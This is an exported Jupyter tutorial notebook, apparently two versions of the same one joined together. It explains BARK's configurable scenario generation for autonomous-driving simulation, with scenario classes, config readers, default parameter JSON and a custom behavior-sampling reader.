params_src_sink_right["ConfigGoalDefinitions"]["GoalTypeControlled"] = "LaneChangeLeft"
params_src_sink_left = params["Scenario"]["Generation"]["ConfigurableScenarioGeneration"]["SinksSources"][0]
params_src_sink_left["ConfigAgentStatesGeometries"]["VehicleDistanceRange"] = [3, 6]
params_src_sink_left["ConfigAgentStatesGeometries"]["OtherVehicleVelocityRange"] = [3, 6]
scenario_generation = ConfigurableScenarioGeneration(num_scenarios = 5, params = params)
num_scenarios_to_show = 5
num_steps_per_scenario = 4
step_time = 0.2
for _ in range(0, num_scenarios_to_show):
scenario, idx = scenario_generation.get_next_scenario()
world = scenario.GetWorldState()
for _ in range(0, num_steps_per_scenario):
viewer.drawWorld(world, eval_agent_ids=scenario._eval_agent_ids, scenario_idx=idx )
display.clear_output(wait=True)
display.display(viewer.axes.get_figure())
world.Step(step_time)
viewer.clear()
###Output
_____no_output_____
###Markdown
3.5 Writing an own config reader to sample behavior typeThere is a number of config readers defined in [config_readers](https://github.com/bark-simulator/bark/tree/master/bark/runtime/scenario/scenario_generation/config_readers) and we plan to extend this set further in the future. In this section, we demonstrate how to write your own config reader, writing a config reader for behavior model sampling. But the process can be easily applied to the other config reader types as well.The config reader shall randomly sample behavior types among a list of specified behavior types. We reimplement the interface of ConfigReaderBehaviorModels as follows
###Code
from bark.runtime.scenario.scenario_generation.config_readers.config_readers_interfaces import ConfigReaderBehaviorModels
from bark.core.models.behavior import *
from bark.runtime.commons.parameters import ParameterServer
class SampleBehaviorType(ConfigReaderBehaviorModels):
def __init__(self, random_state):
super().__init__(random_state)
self.param_servers = []
def create_from_config(self, config_param_object, road_corridor, agent_states, **kwargs):
model_types = config_param_object["ModelTypesList", "Type of behavior model" \
"used for all vehicles", ["BehaviorIDMClassic", "BehaviorMobil"]]
model_params = config_param_object.AddChild("ModelParams")
# ----- DEFAULT PARAMETER HANDLING
# based on types retrieve default params which are maintained as scenario defaults
for model_type in model_types:
behavior_params = model_params.AddChild(model_type)
_, _ = self.model_from_model_type(model_type, behavior_params)
#param server must be persisted for each behavior to enable serialization of parameters
#------ BEHAVIOR MODEL SAMPLING
behavior_models = []
behavior_model_types = []
for _ in agent_states:
model_idx = self.random_state.randint(low=0, high=len(model_types), size=None)
model_type = model_types[model_idx]
model_type_params = model_params.AddChild(model_type)
params = ParameterServer()
bark_model, params = self.model_from_model_type(model_type, model_type_params)
self.param_servers.append(model_type_params)
behavior_models.append(bark_model)
behavior_model_types.append(model_type)
return behavior_models, {"behavior_model_types" : behavior_model_types}, config_param_object
def model_from_model_type(self, model_type, params):
bark_model = eval("{}(params)".format(model_type))
return bark_model, params
def get_param_servers(self):
return self.param_servers
###Output
_____no_output_____
###Markdown
The main functionality is covered in `create_from_config(self, config_param_object, road_corridor, agent_states, **kwargs)`. Here, we first read a list of behavior types from the parameter server and read it out the default parameters of these model types. Then, we use the global random seed state managed by the scenario generation to sample the behavior types. Note that the parameter servers of objects must be persisted to allow for serialization of behavior models. This class definition must be found by ConfigurableScenarioGeneration. We put it into the [behavior_model_config_readers.py](https://github.com/bark-simulator/bark/blob/master/bark/runtime/scenario/scenario_generation/config_readers/behavior_model_config_readers.py) containing the already existing ConfigReaderBehaviorModels.Now, we use this config to randomly sample Mobil and IDM models on the right highway lane. We can first set the type of ConfigBehaviorModels to our new definition. By rerunning the scenario generation, all **default parameters are automatically extracted**. Afterwards, we can finetune these parameters. First let's specify the new config type and extract the defaults. To specify a config type simply use the name given to the config reader class. We now have the following initial source sink config and running the scenario generation gives as the default params. These can of course be customized as desired
###Code
sink_source_dict = [{
"SourceSink": [[5111.626, 5006.8305], [5110.789, 5193.1725] ],
"Description": "left_lane",
"ConfigAgentStatesGeometries": {"Type": "UniformVehicleDistribution", "LanePositions": [0]},
"ConfigBehaviorModels": {"Type": "FixedBehaviorType"},
"ConfigExecutionModels": {"Type": "FixedExecutionType"},
"ConfigDynamicModels": {"Type": "FixedDynamicType"},
"ConfigGoalDefinitions": {"Type": "FixedGoalTypes"},
"ConfigControlledAgents": {"Type": "NoneControlled"},
"AgentParams" : {}
},
{
"SourceSink": [[5111.626, 5006.8305], [5110.789, 5193.1725] ],
"Description": "right_lane",
"ConfigAgentStatesGeometries": {"Type": "UniformVehicleDistribution", "LanePositions": [1]},
"ConfigBehaviorModels": {"Type": "SampleBehaviorType"},
"ConfigExecutionModels": {"Type": "FixedExecutionType"},
"ConfigDynamicModels": {"Type": "FixedDynamicType"},
"ConfigGoalDefinitions": {"Type": "FixedGoalTypes"},
"ConfigControlledAgents": {"Type": "RandomSingleAgent"},
"AgentParams" : {}
}]
params = ParameterServer()
params["World"]["remove_agents_out_of_map"] = True
params["Scenario"]["Generation"]["ConfigurableScenarioGeneration"]["SinksSources"] = sink_source_dict
scenario_generation = ConfigurableScenarioGeneration(num_scenarios=2,params=params)
print("\n\n ------ ConfigBehaviorModels Default Parameters ---------")
print(json.dumps(params["Scenario"]["Generation"]["ConfigurableScenarioGeneration"]["SinksSources"][1]["ConfigBehaviorModels"], indent=4))
plt.figure(figsize=(10, 10))
viewer = MPViewer(
params=params,
y_length = 80,
enforce_y_length=True,
enforce_x_length=False,
use_world_bounds=True,
axis=plt.gca())
num_scenarios_to_show = 5
num_steps_per_scenario = 20
step_time = 0.2
for _ in range(0, num_scenarios_to_show):
scenario, idx = scenario_generation.get_next_scenario()
world = scenario.GetWorldState()
for _ in range(0, num_steps_per_scenario):
viewer.drawWorld(world, eval_agent_ids=scenario._eval_agent_ids, scenario_idx=idx )
display.clear_output(wait=True)
display.display(viewer.axes.get_figure())
world.Step(step_time)
viewer.clear()
###Output
_____no_output_____
###Markdown
3. Configurable Scenario GenerationIn this notebook, we demonstrate the capabilities of the configurable scenario generation of BARK. First, we clarify what a BARK scenario is, to then describe how the configurable scenario generation allows flexible, extensible creation of a variety of scenario types. 3.1 BARK ScenariosA BARK scenario contains a list of agentswith their initial states, behavior, execution and dynamicmodels as well as a goal definition for each agent. Further,it contains a map file in the OpenDrive format. To supportbehavior benchmarking, each scenario specifies which agentis considered as the ‘controlled’ agent during the simulation.A BARK scenario does not explicitly specify how agentswill behave over time, e.g. using predefined maneuvers ortrajectories. A BARK scenario thus uses the following implementation:
###Code
class Scenario:
def __init__(self,
agent_list=None,
eval_agent_ids=None,
map_file_name=None,
json_params=None,
map_interface=None):
self._agent_list = agent_list or []
self._eval_agent_ids = eval_agent_ids or []
self._map_file_name = map_file_name
self._json_params = json_params
self._map_interface = map_interface
###Output
_____no_output_____
###Markdown
The scenario class separately persists agents and the map file name. When multiple scenarios are based on the same map file, this then avoids serialization of processed map information in all the scenarios. In contrast, agents are fully serialized via python pickling. For this, the C++ agent class and all members, e.g behavior models suport python serialization.Before starting to run a scenario. The benchmark runner then calls `_build_world_state` to create the world state used in a simulation run:
###Code
def _build_world_state(self):
param_server = ParameterServer(json=self._json_params)
world = World(param_server)
if self._map_interface is None:
world = self.SetupMap(world, self._map_file_name)
else:
world.SetMap(self._map_interface)
for agent in self._agent_list:
agent.GenerateRoadCorridor(self._map_interface)
world.AddAgent(agent)
return world
###Output
_____no_output_____
###Markdown
3.2 BARK Scenario GenerationBased on the scenario definition, we define a Scenario Generation base class being responsible to create a list of scenario and managing saving, loading of scenario sets and getting of scenarios. The simplified structure of BARK's base scenario generation is:
###Code
class ScenarioGeneration:
def __init__(self, params=None, num_scenarios=None, random_seed=1000):
self._params = params
self._current_scenario_idx = 0
self._random_seed = random_seed
self._scenario_list = self.create_scenarios(params, num_scenarios)
def get_scenario(self, idx):
return self._scenario_list[idx].copy()
def dump_scenario_list(self, filename):
with open(filename, "wb") as file:
# print("SAVE PATH:", os.path.abspath(filename))
pickle.dump(self._scenario_list, file)
def load_scenario_list(self, filename):
with open(filename, "rb") as file:
self._scenario_list = pickle.load(file)
###Output
_____no_output_____
###Markdown
This base class allows to easily create new scenario generations while enabling easy integration in to BARK's benchmarking and ML training platforms which use these common interfaces.Let's have a look how what the configurable scenario generation provides. 3.3 Concept of Configurable Scenario GenerationThough, new scenarios generations are supported with the common interface, we require a modularized perspective on the set of features characterizing a scenario. For instance, we want to configure initial states of agents independently of behavior models or goal configurations. To achieve this, we must ensure that configuration options for one set of features can easily be combined with other sets of features. The configurable scenario generation implements this requirement.The fundamental building blocks of a scenario in the configurable scenario generation are source sink pairs. A source sink pair defines a road corridor in the map. It is specified with either a pair of OpenDrive Road Ids or a pair of X/Y Points. For each source sink pair, multiple config readers are responsible to create the features within this sink source pair. Config readers exist for each relevant property in a scenario which are processed for a source sinks pair in a specific order. Information from config reader is passed to the next readers. We distinguish between fundamdental information to build a scenario which must be returned by a config reader and optional information which may be passed and could be incorporated by subsequent readers. The information flow to create the agents in a **single** source sink config is as follows 1. ConfigReaderAgentStatesAndGeometries: - Retrieves: Road corridor of this source sink - Must return: list of agent states and a list of agent shapes - Optional return: e.g. list of agent ids, lane positions,2. ConfigBehaviorModels: - Retrieves: Road corridor of this source sink, agent state list, collected optional returns - Must return: list of behavior models for each agent in agent state list - Optional return: e.g. list of types of behavior models3. ConfigExecutionModels: - Retrieves: Road corridor of this source sink, agent state list, collected optional returns - Must return: list of execution models for each agent in agent state list - Optional return: e.g. list of types of execution models4. ConfigDynamicModels: - Retrieves: Road corridor of this source sink, agent state list, collected optional returns - Must return: list of dynamic models for each agent in agent state list - Optional return: e.g. list of types of dynamic models5. ConfigControlledAgents: - Retrieves: Road corridor of this source sink, agent state list, collected optional returns - Must return: List of size agent state list with True or False indicating if agent is controlled in a benchmarking run or not - Optional return: normally nothing6. ConfigGoalDefinitions: - Retrieves: Road corridor of this source sink, agent state list, list of controlled_agent_ids, collected optional returns - Must return: List of goal definitions one for each agent in agent state list - Optional return: normally nothing Returns are collected and finally the agents for the source sink config are created. Then, the chain is run for the next source sink config. The interfaces of all config reader types are implemented in [config_readers_interfaces.py](https://github.com/bark-simulator/bark/blob/master/modules/runtime/scenario/scenario_generation/config_readers/config_readers_interfaces.py) 3.4 Understanding Parameter FilesLet's have a look at the default parameter file of the configurable scenario generation to better understand this concept:
###Code
import config_notebook
import json
from modules.runtime.scenario.scenario_generation.configurable_scenario_generation import ConfigurableScenarioGeneration
from modules.runtime.commons.parameters import ParameterServer
params = ParameterServer()
scenario_generation = ConfigurableScenarioGeneration(num_scenarios = 5, params = params)
params.Save("default_params.json")
print("\n\n ------ Scenario Default Parameters ---------")
print(json.dumps(params.ConvertToDict(), indent=4))
###Output
Changing to bark root /home/esterle/.cache/bazel/_bazel_esterle/d337abac8c371120c1b9affa1049fa7e/execroot/bark_project/bazel-out/k8-fastbuild/bin/docs/tutorials/run.runfiles/bark_project
Writing parameters to /home/esterle/.cache/bazel/_bazel_esterle/d337abac8c371120c1b9affa1049fa7e/execroot/bark_project/bazel-out/k8-fastbuild/bin/docs/tutorials/run.runfiles/bark_project/default_params.json
------ Scenario Default Parameters ---------
{
"Scenario": {
"Generation": {
"ConfigurableScenarioGeneration": {
"MapFilename": "modules/runtime/tests/data/city_highway_straight.xodr",
"SinksSources": [
{
"SourceSink": [
[
5111.626,
5006.8305
],
[
5110.789,
5193.1725
]
],
"Description": "left_lane",
"ConfigAgentStatesGeometries": {
"Type": "UniformVehicleDistribution",
"LanePositions": [
0
],
"VehicleDistanceRange": [
10,
20
],
"OtherVehicleVelocityRange": [
20,
30
],
"SRange": [
0.1,
0.7
]
},
"ConfigBehaviorModels": {
"Type": "FixedBehaviorType",
"ModelType": "BehaviorIDMClassic",
"ModelParams": {
"BehaviorIDMClassic": {
"MaxVelocity": 60.0,
"MinimumSpacing": 2.0,
"DesiredTimeHeadway": 1.5,
"MaxAcceleration": 1.7000000476837158,
"AccelerationLowerBound": -5.0,
"AccelerationUpperBound": 8.0,
"DesiredVelocity": 15.0,
"ComfortableBrakingAcceleration": 1.6699999570846558,
"MinVelocity": 0.0,
"Exponent": 4
}
}
},
"ConfigExecutionModels": {
"Type": "FixedExecutionType",
"ModelType": "ExecutionModelInterpolate"
},
"ConfigDynamicModels": {
"Type": "FixedDynamicType",
"ModelType": "SingleTrackModel"
},
"ConfigGoalDefinitions": {
"Type": "FixedGoalTypes",
"GoalTypeControlled": "EndOfLane",
"GoalTypeOthers": "EndOfLane",
"MaxLateralDist": [
0.1,
0.1
],
"LongitudinalRange": [
0,
1.0
],
"MaxOrientationDifference": [
0.08,
0.08
],
"VelocityRange": [
10,
20
]
},
"ConfigControlledAgents": {
"Type": "NoneControlled"
},
"AgentParams": {
"MaxHistoryLength": 50
}
},
{
"SourceSink": [
[
5111.626,
5006.8305
],
[
5110.789,
5193.1725
]
],
"Description": "right_lane",
"ConfigAgentStatesGeometries": {
"Type": "UniformVehicleDistribution",
"LanePositions": [
1
],
"VehicleDistanceRange": [
10,
20
],
"OtherVehicleVelocityRange": [
20,
30
],
"SRange": [
0.1,
0.7
]
},
"ConfigBehaviorModels": {
"Type": "FixedBehaviorType",
"ModelType": "BehaviorIDMClassic",
"ModelParams": {
"BehaviorIDMClassic": {
"MaxVelocity": 30.0,
"MinimumSpacing": 2.0,
"DesiredTimeHeadway": 1.5,
"MaxAcceleration": 1.7000000476837158,
"AccelerationLowerBound": -5.0,
"AccelerationUpperBound": 8.0,
"DesiredVelocity": 15.0,
"ComfortableBrakingAcceleration": 1.6699999570846558,
"MinVelocity": 0.0,
"Exponent": 4
}
}
},
"ConfigExecutionModels": {
"Type": "FixedExecutionType",
"ModelType": "ExecutionModelInterpolate"
},
"ConfigDynamicModels": {
"Type": "FixedDynamicType",
"ModelType": "SingleTrackModel"
},
"ConfigGoalDefinitions": {
"Type": "FixedGoalTypes",
"GoalTypeControlled": "EndOfLane",
"GoalTypeOthers": "EndOfLane",
"MaxLateralDist": [
0.1,
0.1
],
"LongitudinalRange": [
0,
1.0
],
"MaxOrientationDifference": [
0.08,
0.08
],
"VelocityRange": [
10,
20
]
},
"ConfigControlledAgents": {
"Type": "RandomSingleAgent"
},
"AgentParams": {
"MaxHistoryLength": 50
}
}
],
"ConflictResolution": {
"left_lane/right_lane": [
0.2,
0.8
]
}
}
}
}
}
###Markdown
In the default configuration, we have two sources and sinks specified. One for the left lane of the road corridor on an highway, one for the right lane. We use the config reader type UniformVehicleDistribution for ConfigAgentStatesGeometries. There, we can specify vehicle distance ranges and ranges of initial velocity. As behavior model config, we use FixedBehaviorType, where one type of behavior model with its parameters is specified. Goal definition uses config reader FixedGoalTypes enabling separate specification of goal definitions for controlled and non-controlled agents. It uses a FrenetGoalType with a geometric goal region around the centerline of the goal lane. The range of this region is specified via parameter LongitudinalRange. With BARKs runtime, we can have a look through the sceanarios created with the default parameter config:
###Code
from IPython import display
from modules.runtime.viewer.matplotlib_viewer import MPViewer
from modules.runtime.runtime import Runtime
import matplotlib.pyplot as plt
plt.figure(figsize=(10, 10))
viewer = MPViewer(
params=params,
y_length = 80,
enforce_y_length=True,
enforce_x_length=False,
follow_agent_id=True,
axis=plt.gca())
num_scenarios_to_show = 5
num_steps_per_scenario = 4
step_time = 0.2
for _ in range(0, num_scenarios_to_show):
scenario, idx = scenario_generation.get_next_scenario()
world = scenario.GetWorldState()
for _ in range(0, num_steps_per_scenario):
viewer.drawWorld(world, eval_agent_ids=scenario._eval_agent_ids, scenario_idx=idx )
display.clear_output(wait=True)
display.display(viewer.axes.get_figure())
world.Step(step_time)
viewer.clear()
###Output
_____no_output_____
###Markdown
We see the controlled agent in red and its goal region on the right lane. We now tune the parameters that the controlled agents goal is on the left lane. Additionally, we want to create more dense traffic on the left lane to make the lane change scenario harder. We decrease the range for sampling distances and velocity. Further and recreate the scenarios:
###Code
params_src_sink_right = params["Scenario"]["Generation"]["ConfigurableScenarioGeneration"]["SinksSources"][1]
params_src_sink_right["ConfigGoalDefinitions"]["GoalTypeControlled"] = "LaneChangeLeft"
params_src_sink_left = params["Scenario"]["Generation"]["ConfigurableScenarioGeneration"]["SinksSources"][0]
params_src_sink_left["ConfigAgentStatesGeometries"]["VehicleDistanceRange"] = [3, 6]
params_src_sink_left["ConfigAgentStatesGeometries"]["OtherVehicleVelocityRange"] = [3, 6]
scenario_generation = ConfigurableScenarioGeneration(num_scenarios = 5, params = params)
num_scenarios_to_show = 5
num_steps_per_scenario = 4
step_time = 0.2
for _ in range(0, num_scenarios_to_show):
scenario, idx = scenario_generation.get_next_scenario()
world = scenario.GetWorldState()
for _ in range(0, num_steps_per_scenario):
viewer.drawWorld(world, eval_agent_ids=scenario._eval_agent_ids, scenario_idx=idx )
display.clear_output(wait=True)
display.display(viewer.axes.get_figure())
world.Step(step_time)
viewer.clear()
###Output
_____no_output_____
###Markdown
3.5 Writing an own config reader to sample behavior typeThere is a number of config readers defined in [config_readers](https://github.com/bark-simulator/bark/tree/master/modules/runtime/scenario/scenario_generation/config_readers) and we plan to extend this set further in the future. In this section, we demonstrate how to write your own config reader, writing a config reader for behavior model sampling. But the process can be easily applied to the other config reader types as well.The config reader shall randomly sample behavior types among a list of specified behavior types. We reimplement the interface of ConfigReaderBehaviorModels as follows
###Code
from modules.runtime.scenario.scenario_generation.config_readers.config_readers_interfaces import ConfigReaderBehaviorModels
from bark.models.behavior import *
from modules.runtime.commons.parameters import ParameterServer
class SampleBehaviorType(ConfigReaderBehaviorModels):
def __init__(self, random_state):
super().__init__(random_state)
self.param_servers = []
def create_from_config(self, config_param_object, road_corridor, agent_states, **kwargs):
model_types = config_param_object["ModelTypesList", "Type of behavior model" \
"used for all vehicles", ["BehaviorIDMClassic", "BehaviorMobil"]]
model_params = config_param_object.AddChild("ModelParams")
# ----- DEFAULT PARAMETER HANDLING
# based on types retrieve default params which are maintained as scenario defaults
for model_type in model_types:
behavior_params = model_params.AddChild(model_type)
_, _ = self.model_from_model_type(model_type, behavior_params)
#param server must be persisted for each behavior to enable serialization of parameters
#------ BEHAVIOR MODEL SAMPLING
behavior_models = []
behavior_model_types = []
for _ in agent_states:
model_idx = self.random_state.randint(low=0, high=len(model_types), size=None)
model_type = model_types[model_idx]
model_type_params = model_params.AddChild(model_type)
params = ParameterServer()
bark_model, params = self.model_from_model_type(model_type, model_type_params)
self.param_servers.append(model_type_params)
behavior_models.append(bark_model)
behavior_model_types.append(model_type)
return behavior_models, {"behavior_model_types" : behavior_model_types}, config_param_object
def model_from_model_type(self, model_type, params):
bark_model = eval("{}(params)".format(model_type))
return bark_model, params
def get_param_servers(self):
return self.param_servers
###Output
_____no_output_____
###Markdown
The main functionality is covered in `create_from_config(self, config_param_object, road_corridor, agent_states, **kwargs)`. Here, we first read a list of behavior types from the parameter server and read it out the default parameters of these model types. Then, we use the global random seed state managed by the scenario generation to sample the behavior types. Note that the parameter servers of objects must be persisted to allow for serialization of behavior models. This class definition must be found by ConfigurableScenarioGeneration. We put it into the [behavior_model_config_readers.py](https://github.com/bark-simulator/bark/blob/master/modules/runtime/scenario/scenario_generation/config_readers/behavior_model_config_readers.py) containing the already existing ConfigReaderBehaviorModels.Now, we use this config to randomly sample Mobil and IDM models on the right highway lane. We can first set the type of ConfigBehaviorModels to our new definition. By rerunning the scenario generation, all **default parameters are automatically extracted**. Afterwards, we can finetune these parameters. First let's specify the new config type and extract the defaults. To specify a config type simply use the name given to the config reader class. We now have the following initial source sink config and running the scenario generation gives as the default params. These can of course be customized as desired
###Code
sink_source_dict = [{
"SourceSink": [[5111.626, 5006.8305], [5110.789, 5193.1725] ],
"Description": "left_lane",
"ConfigAgentStatesGeometries": {"Type": "UniformVehicleDistribution", "LanePositions": [0]},
"ConfigBehaviorModels": {"Type": "FixedBehaviorType"},
"ConfigExecutionModels": {"Type": "FixedExecutionType"},
"ConfigDynamicModels": {"Type": "FixedDynamicType"},
"ConfigGoalDefinitions": {"Type": "FixedGoalTypes"},
"ConfigControlledAgents": {"Type": "NoneControlled"},
"AgentParams" : {}
},
{
"SourceSink": [[5111.626, 5006.8305], [5110.789, 5193.1725] ],
"Description": "right_lane",
"ConfigAgentStatesGeometries": {"Type": "UniformVehicleDistribution", "LanePositions": [1]},
"ConfigBehaviorModels": {"Type": "SampleBehaviorType"},
"ConfigExecutionModels": {"Type": "FixedExecutionType"},
"ConfigDynamicModels": {"Type": "FixedDynamicType"},
"ConfigGoalDefinitions": {"Type": "FixedGoalTypes"},
"ConfigControlledAgents": {"Type": "RandomSingleAgent"},
"AgentParams" : {}
}]
params = ParameterServer()
params["World"]["remove_agents_out_of_map"] = True
params["Scenario"]["Generation"]["ConfigurableScenarioGeneration"]["SinksSources"] = sink_source_dict
scenario_generation = ConfigurableScenarioGeneration(num_scenarios=2,params=params)
print("\n\n ------ ConfigBehaviorModels Default Parameters ---------")
print(json.dumps(params["Scenario"]["Generation"]["ConfigurableScenarioGeneration"]["SinksSources"][1]["ConfigBehaviorModels"], indent=4))
plt.figure(figsize=(10, 10))
viewer = MPViewer(
params=params,
y_length = 80,
enforce_y_length=True,
enforce_x_length=False,
use_world_bounds=True,
axis=plt.gca())
num_scenarios_to_show = 5
num_steps_per_scenario = 20
step_time = 0.2
for _ in range(0, num_scenarios_to_show):
scenario, idx = scenario_generation.get_next_scenario()
world = scenario.GetWorldState()
for _ in range(0, num_steps_per_scenario):
viewer.drawWorld(world, eval_agent_ids=scenario._eval_agent_ids, scenario_idx=idx )
display.clear_output(wait=True)
display.display(viewer.axes.get_figure())
world.Step(step_time)
viewer.clear()
###Output
_____no_output_____
###Markdown
3. Configurable Scenario GenerationIn this notebook, we demonstrate the capabilities of the configurable scenario generation of BARK. First, we clarify what a BARK scenario is, to then describe how the configurable scenario generation allows flexible, extensible creation of a variety of scenario types. 3.1 BARK ScenariosA BARK scenario contains a list of agentswith their initial states, behavior, execution and dynamicmodels as well as a goal definition for each agent. Further,it contains a map file in the OpenDrive format. To supportbehavior benchmarking, each scenario specifies which agentis considered as the ‘controlled’ agent during the simulation.A BARK scenario does not explicitly specify how agentswill behave over time, e.g. using predefined maneuvers ortrajectories. A BARK scenario thus uses the following implementation:
###Code
class Scenario:
def __init__(self,
agent_list=None,
eval_agent_ids=None,
map_file_name=None,
json_params=None,
map_interface=None):
self._agent_list = agent_list or []
self._eval_agent_ids = eval_agent_ids or []
self._map_file_name = map_file_name
self._json_params = json_params
self._map_interface = map_interface
###Output
_____no_output_____
###Markdown
The scenario class separately persists agents and the map file name. When multiple scenarios are based on the same map file, this then avoids serialization of processed map information in all the scenarios. In contrast, agents are fully serialized via python pickling. For this, the C++ agent class and all members, e.g behavior models suport python serialization.Before starting to run a scenario. The benchmark runner then calls `_build_world_state` to create the world state used in a simulation run:
###Code
def _build_world_state(self):
param_server = ParameterServer(json=self._json_params)
world = World(param_server)
if self._map_interface is None:
world = self.SetupMap(world, self._map_file_name)
else:
world.SetMap(self._map_interface)
for agent in self._agent_list:
agent.GenerateRoadCorridor(self._map_interface)
world.AddAgent(agent)
return world
###Output
_____no_output_____
###Markdown
3.2 BARK Scenario GenerationBased on the scenario definition, we define a Scenario Generation base class being responsible to create a list of scenario and managing saving, loading of scenario sets and getting of scenarios. The simplified structure of BARK's base scenario generation is:
###Code
class ScenarioGeneration:
def __init__(self, params=None, num_scenarios=None, random_seed=1000):
self._params = params
self._current_scenario_idx = 0
self._random_seed = random_seed
self._scenario_list = self.create_scenarios(params, num_scenarios)
def get_scenario(self, idx):
return self._scenario_list[idx].copy()
def dump_scenario_list(self, filename):
with open(filename, "wb") as file:
# print("SAVE PATH:", os.path.abspath(filename))
pickle.dump(self._scenario_list, file)
def load_scenario_list(self, filename):
with open(filename, "rb") as file:
self._scenario_list = pickle.load(file)
###Output
_____no_output_____
###Markdown
This base class allows to easily create new scenario generations while enabling easy integration in to BARK's benchmarking and ML training platforms which use these common interfaces.Let's have a look how what the configurable scenario generation provides. 3.3 Concept of Configurable Scenario GenerationThough, new scenarios generations are supported with the common interface, we require a modularized perspective on the set of features characterizing a scenario. For instance, we want to configure initial states of agents independently of behavior models or goal configurations. To achieve this, we must ensure that configuration options for one set of features can easily be combined with other sets of features. The configurable scenario generation implements this requirement.The fundamental building blocks of a scenario in the configurable scenario generation are source sink pairs. A source sink pair defines a road corridor in the map. It is specified with either a pair of OpenDrive Road Ids or a pair of X/Y Points. For each source sink pair, multiple config readers are responsible to create the features within this sink source pair. Config readers exist for each relevant property in a scenario which are processed for a source sinks pair in a specific order. Information from config reader is passed to the next readers. We distinguish between fundamdental information to build a scenario which must be returned by a config reader and optional information which may be passed and could be incorporated by subsequent readers. The information flow to create the agents in a **single** source sink config is as follows 1. ConfigReaderAgentStatesAndGeometries: - Retrieves: Road corridor of this source sink - Must return: list of agent states and a list of agent shapes - Optional return: e.g. list of agent ids, lane positions,2. ConfigBehaviorModels: - Retrieves: Road corridor of this source sink, agent state list, collected optional returns - Must return: list of behavior models for each agent in agent state list - Optional return: e.g. list of types of behavior models3. ConfigExecutionModels: - Retrieves: Road corridor of this source sink, agent state list, collected optional returns - Must return: list of execution models for each agent in agent state list - Optional return: e.g. list of types of execution models4. ConfigDynamicModels: - Retrieves: Road corridor of this source sink, agent state list, collected optional returns - Must return: list of dynamic models for each agent in agent state list - Optional return: e.g. list of types of dynamic models5. ConfigControlledAgents: - Retrieves: Road corridor of this source sink, agent state list, collected optional returns - Must return: List of size agent state list with True or False indicating if agent is controlled in a benchmarking run or not - Optional return: normally nothing6. ConfigGoalDefinitions: - Retrieves: Road corridor of this source sink, agent state list, list of controlled_agent_ids, collected optional returns - Must return: List of goal definitions one for each agent in agent state list - Optional return: normally nothing Returns are collected and finally the agents for the source sink config are created. Then, the chain is run for the next source sink config. The interfaces of all config reader types are implemented in [config_readers_interfaces.py](https://github.com/bark-simulator/bark/blob/master/bark/runtime/scenario/scenario_generation/config_readers/config_readers_interfaces.py) 3.4 Understanding Parameter FilesLet's have a look at the default parameter file of the configurable scenario generation to better understand this concept:
###Code
import config_notebook
import json
from bark.runtime.scenario.scenario_generation.configurable_scenario_generation import ConfigurableScenarioGeneration
from bark.runtime.commons.parameters import ParameterServer
import os
params = ParameterServer()
scenario_generation = ConfigurableScenarioGeneration(num_scenarios = 20, params = params)
params.Save("default_params.json")
print("\n\n ------ Scenario Default Parameters ---------")
print(json.dumps(params.ConvertToDict(), indent=4))
###Output
Changing to bark root /home/julo/.cache/bazel/_bazel_julo/bcfa68c1d349bf355e13000545508072/execroot/bark_project/bazel-out/k8-fastbuild/bin/docs/tutorials/run.runfiles/bark_project
<bark.runtime.commons.parameters.ParameterServer object at 0x7f70a4e9f9b0>
bark/runtime/tests/data/city_highway_straight.xodr
Writing parameters to /home/julo/.cache/bazel/_bazel_julo/bcfa68c1d349bf355e13000545508072/execroot/bark_project/bazel-out/k8-fastbuild/bin/docs/tutorials/run.runfiles/bark_project/default_params.json
------ Scenario Default Parameters ---------
{
"Scenario": {
"Generation": {
"ConfigurableScenarioGeneration": {
"MapFilename": "bark/runtime/tests/data/city_highway_straight.xodr",
"SinksSources": [
{
"SourceSink": [
[
5111.626,
5006.8305
],
[
5110.789,
5193.1725
]
],
"Description": "left_lane",
"ConfigAgentStatesGeometries": {
"Type": "UniformVehicleDistribution",
"LanePositions": [
0
],
"VehicleDistanceRange": [
10,
20
],
"OtherVehicleVelocityRange": [
20,
30
],
"SRange": [
0.1,
0.7
]
},
"ConfigBehaviorModels": {
"Type": "FixedBehaviorType",
"ModelType": "BehaviorIDMClassic",
"ModelParams": {
"BehaviorIDMClassic": {
"MaxVelocity": 60.0,
"MinimumSpacing": 2.0,
"DesiredTimeHeadway": 1.5,
"MaxAcceleration": 1.7000000476837158,
"AccelerationLowerBound": -5.0,
"AccelerationUpperBound": 8.0,
"DesiredVelocity": 15.0,
"ComfortableBrakingAcceleration": 1.6699999570846558,
"MinVelocity": 0.0,
"Exponent": 4,
"BrakeForLaneEnd": false,
"BrakeForLaneEndEnabledDistance": 60.0,
"BrakeForLaneEndDistanceOffset": 15.0,
"NumTrajectoryTimePoints": 11,
"CoolnessFactor": 0.0
}
}
},
"ConfigExecutionModels": {
"Type": "FixedExecutionType",
"ModelType": "ExecutionModelInterpolate"
},
"ConfigDynamicModels": {
"Type": "FixedDynamicType",
"ModelType": "SingleTrackModel"
},
"ConfigGoalDefinitions": {
"Type": "FixedGoalTypes",
"GoalTypeControlled": "EndOfLane",
"EnforceControlledGoal": true,
"GoalTypeOthers": "EndOfLane",
"EnforceOthersGoal": true,
"MaxLateralDist": [
0.1,
0.1
],
"LongitudinalRange": [
0,
1.0
],
"MaxOrientationDifference": [
0.08,
0.08
],
"VelocityRange": [
10,
20
]
},
"ConfigControlledAgents": {
"Type": "NoneControlled"
},
"AgentParams": {
"MaxHistoryLength": 50
}
},
{
"SourceSink": [
[
5111.626,
5006.8305
],
[
5110.789,
5193.1725
]
],
"Description": "right_lane",
"ConfigAgentStatesGeometries": {
"Type": "UniformVehicleDistribution",
"LanePositions": [
1
],
"VehicleDistanceRange": [
10,
20
],
"OtherVehicleVelocityRange": [
20,
30
],
"SRange": [
0.1,
0.7
]
},
"ConfigBehaviorModels": {
"Type": "FixedBehaviorType",
"ModelType": "BehaviorIDMClassic",
"ModelParams": {
"BehaviorIDMClassic": {
"MaxVelocity": 30.0,
"MinimumSpacing": 2.0,
"DesiredTimeHeadway": 1.5,
"MaxAcceleration": 1.7000000476837158,
"AccelerationLowerBound": -5.0,
"AccelerationUpperBound": 8.0,
"DesiredVelocity": 15.0,
"ComfortableBrakingAcceleration": 1.6699999570846558,
"MinVelocity": 0.0,
"Exponent": 4,
"BrakeForLaneEnd": false,
"BrakeForLaneEndEnabledDistance": 60.0,
"BrakeForLaneEndDistanceOffset": 15.0,
"NumTrajectoryTimePoints": 11,
"CoolnessFactor": 0.0
}
}
},
"ConfigExecutionModels": {
"Type": "FixedExecutionType",
"ModelType": "ExecutionModelInterpolate"
},
"ConfigDynamicModels": {
"Type": "FixedDynamicType",
